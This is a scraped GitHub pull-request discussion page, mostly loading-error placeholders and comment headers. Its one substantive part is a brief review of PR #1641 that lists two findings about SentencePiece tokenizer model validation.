github-actions Bot commented Jun 11, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Performance Benchmarks

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot commented Jun 11, 2026

Uh oh!

mldangelo-oai commented Jun 11, 2026

Independent review of PR #1641

Findings

P2: valid-looking prefix suppresses malformed SentencePiece tails

P2: valid SentencePiece models can omit BOS, EOS, and PAD

Validation

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot left a comment

Choose a reason for hiding this comment

💡 Codex Review

Uh oh!

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot left a comment

Choose a reason for hiding this comment

💡 Codex Review

Uh oh!

Uh oh!

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot left a comment

Choose a reason for hiding this comment

💡 Codex Review

Uh oh!

Uh oh!

Uh oh!

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot commented Jun 11, 2026

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot commented Jun 11, 2026

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot commented Jun 11, 2026

Uh oh!

mldangelo-oai commented Jun 11, 2026

Uh oh!

chatgpt-codex-connector Bot left a comment

Choose a reason for hiding this comment

💡 Codex Review

Uh oh!

mldangelo-oai commented Jun 11, 2026 •

edited

Loading

github-actions Bot commented Jun 11, 2026 •

edited

Loading